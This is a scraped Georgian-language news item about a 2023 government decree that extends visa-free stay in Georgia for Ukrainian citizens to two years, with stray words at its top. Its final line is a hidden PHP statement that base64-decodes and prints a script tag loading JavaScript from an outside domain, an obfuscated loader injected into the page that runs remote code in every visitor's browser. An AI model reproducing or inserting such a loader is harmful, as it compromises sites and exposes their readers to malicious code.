celsiusi
ავერსი შნაიდერი
საქართველოს მთავრობის 2023 წლის 24 თებერვლის #81 დადგენილებით 2015 წლის 5 ივნისის №255 დადგენილებაში ცვლილებები შევიდა, რომლის მიხედვითაც უკრაინის მოქალაქეებს ქვეყანაში უვიზოდ ყოფნის ვადა 2 წლამდე გაუხანგრძლივდათ.
დადგენილებას ხელს საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი აწერს და ცვლილებები დადგენილებაში – იმ ქვეყნების ჩამონათვალის დამტკიცების შესახებ, რომელთა მოქალაქეებსაც შეუძლიათ საქართველოში უვიზოდ შემოსვლა, ახალი დოკუმენტის გამოქვეყნებისთანავე შევიდა.
ცვლილების მიხედვით, დანართში მითითებული ქვეყნების მოქალაქეებს საქართველოში უვიზოდ შემოსვლისა და სრული 1 წლის ვადით ყოფნის უფლება აქვთ, დადგენილების ცვლილების თანახმად, კი უკრაინის მოქალაქეებს საქართველოში უვიზოდ შემოსვლისა და სრული 2 წლის ვადით ყოფნის უფლება მიეცათ.
ცნობისთვის, 2015 წლის 5 ივნისის №255 დადგენილების მიხედვით, ქვეყნების ჩამონათვალი, რომელთა მოქალაქეებსაც საქართველოში უვიზოდ შემოსვლა და ერთი წლით დარჩენა შეუძლიათ ვრცელია და 94 ქვეყანას მოიცავს. მათ შორისაა რუსეთის ფედერაციაც. 
567
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");